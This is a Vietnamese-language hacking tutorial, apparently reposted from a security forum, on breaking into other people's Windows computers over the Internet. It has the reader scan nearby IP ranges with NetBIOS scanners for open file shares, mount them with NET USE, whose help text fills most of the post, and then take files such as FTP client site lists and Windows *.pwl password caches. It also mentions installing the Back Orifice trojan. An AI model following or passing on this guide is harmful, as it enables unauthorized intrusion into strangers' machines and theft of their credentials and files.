Link: http://www.kmasecurity.net/xforce/thao-luan-chung-ve-hacking/3105-xam-nhap-pc-khac-khi-dang-online.html
Thông thường một hacker trước khi xâm nhập máy tính, thường cố gắng cài một Trojan mở cổng để xâm nhập, nổi tiếng nhất là Trojan Back orffice.
Bài học này sẽ chỉ cho bạn làm thế nào có thể kết nối với một máy tính cài Windows thông qua Internet và có thể lấy thông tin của chúng.
Công cụ cần thiết :
Ðầu tiên là bạn cần là một chương trình scan gọi là Netbios scaner. Tôi dùng Legion hoặc Winhackgold ( Download ở đây ). Chương trình sẽ scan tất cả các máy có mở chia sẻ file trên cùng một netbios.
Bắt đầu :
Sau khi kết nối vào mạng, bạn vào Start/Run rồi đánh winipcfg, bạn sẽ nhận được một địa chỉ IP mà ISP gán cho bạn mỗi khi bạn kết nối, nếu bạn kết nối bằng Modem thì số IP này sẽ thay đổi gọi là IP động.Trong mục SCAN FROM của Legion bạn hãy đánh địa chỉ IP của mình vào. Ví dụ tôi có 203.160.11.48 thì tôi đánh trong Legion on là 203.160.11 thôi. Bây giờ ở mục TO của Legion bạn đánh 203.160.xx (xx là địa chỉ IP bất kì bạn đánh vào, bạn nên đánh số gần nhất với IP của mình, tôi chọn số 12).
Bây giờ ấn nút SCAN, Legion sẽ bắt đầu scan và cho tất cả các địa chỉ IP nó tìm thấy 1 - 254. Nếu bạn may mắn thì khi chọn một địa chỉ IP thì bạn sẽ nhìn thấy như sau :
Shared resources at \\206.11.11.42
Sharename Type Comment
----------------------------------------------
A Disk Floppy
CDRIVE Disk C:\ Drive
DDRIVE Disk D:\ Drive
CDROM Disk CD-Rom Read Only
The command was completed successfully.
Hãy click vào địa chỉ IP đó với các lệnh của USE NET bạn sẽ có quyền kiểm soát địa chỉ IP đó.
Trong cửa sổ DOS-Promt bạn hãy sử dụng các lệnh sau:
NET USE [drive: | *] [\\computer\directory [password | ?]]
[/SAVEPW:NO] [/YES] [/NO]
NET USE [port:] [\\computer\printer [password | ?]]
[/SAVEPW:NO] [/YES] [/NO]
NET USE drive: | \\computer\directory /DELETE [/YES]
NET USE port: | \\computer\printer /DELETE [/YES]
NET USE * /DELETE [/YES]
NET USE drive: | * /HOME
drive Specifies the drive letter you assign to ashared directory.
* Specifies the next available drive letter.
If used with /DELETE, specifies to disconnect all of your connections.port Specifies the parallel (LPT) port name you assign to a shared printer.computer Specifies the name of the computer sharing the resource.directory Specifies the name of the shared directory.printer Specifies the name of the shared printer.password Specifies the password for the shared resource, if any.
? Specifies that you want to be prompted for the password of the shared resource. You don't need to use this option unless the password is optional.
/SAVEPW:NO Specifies that the password you typeshould not be saved in your password-listfile. You need to retype the password the next time you connect to this resource.
/YES Carries out the NET USE command without first prompting you to provide information or confirm actions.
/DELETE Breaks the specified connection to a shared resource.
/NO Carries out the NET USE command, responding with NO automatically when you are prompted to confirm actions.
/HOME Makes a connection to your HOME directory if one is specified in your LAN Manager or Windows NT user account.
To list all of your connections, type NET USE without options.
To see this information one screen at a time, type the following at the command prompt:
NET USE /? | MORE
or
NET HELP USE | MORE
Sau khi xâm nhập bạn cần lấy các thông tin của IP này ! Hãy vào những cái có kiểu \program files\cutètp\tree.dat, \mirc\download, windows\*.pwl ...
